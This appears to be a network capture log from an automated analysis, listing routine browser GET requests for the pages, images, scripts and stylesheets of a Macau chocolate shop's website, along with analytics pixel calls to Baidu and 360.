Source: global trafficHTTP traffic detected: GET /images/menu03b.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /images/menu02b.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /images/menu05b.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /images/menu06b.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /Index.asp HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /m/static/font-icon/font-awesome.min.css HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.gourmethousemacau.com/Index.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /static/bootstrap/css/bootstrap.min.css HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.gourmethousemacau.com/Index.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
Source: global trafficHTTP traffic detected: GET /s.gif?l=http://www.gourmethousemacau.com/Index.asp HTTP/1.1Host: api.share.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&sid=d182b3f28525f2db83acfaaf6e696dba&token=dp1s8a2.bx3efd2n8I5/2m5ofc2.duba HTTP/1.1Host: s.360.cnConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s.gif?l=http://www.gourmethousemacau.com/Index.asp HTTP/1.1Host: api.share.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&sid=d182b3f28525f2db83acfaaf6e696dba&token=dp1s8a2.bx3efd2n8I5/2m5ofc2.duba HTTP/1.1Host: s.360.cnConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /AboutUs.asp HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /js/prototype.js HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Referer: http://www.gourmethousemacau.com/AboutUs.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /js/scriptaculous.js?load=effects HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Referer: http://www.gourmethousemacau.com/AboutUs.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /js/lightbox.js HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Referer: http://www.gourmethousemacau.com/AboutUs.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /css/lightbox.css HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.gourmethousemacau.com/AboutUs.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/menu01.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/AboutUs.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /js/effects.js HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Referer: http://www.gourmethousemacau.com/AboutUs.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/pic_aboutus.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/AboutUs.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/menu01.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/video.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/AboutUs.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/icon_photo.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/AboutUs.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/title_aboutus.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/AboutUs.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/video.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/title_aboutus.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/icon_photo.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/loading.gif HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/AboutUs.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/closelabel.gif HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/AboutUs.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/pic_aboutus.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/loading.gif HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/closelabel.gif HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /OurChocology.asp HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /fenye.css HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.gourmethousemacau.com/OurChocology.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/pic_chocology.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurChocology.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/icon_download.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurChocology.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/icon_Gallery.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurChocology.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/title_chocology.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurChocology.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/title_chocology.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/icon_download.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/pic_chocology.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/icon_Gallery.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /OurProducts.asp HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/productMain_top.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurProducts.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /images/title_products.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurProducts.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
Source: global trafficHTTP traffic detected: GET /uploadfiles/SRL_1_1_3750019.jpg HTTP/1.1Host: www.gourmethousemacau.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://www.gourmethousemacau.com/OurProducts.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
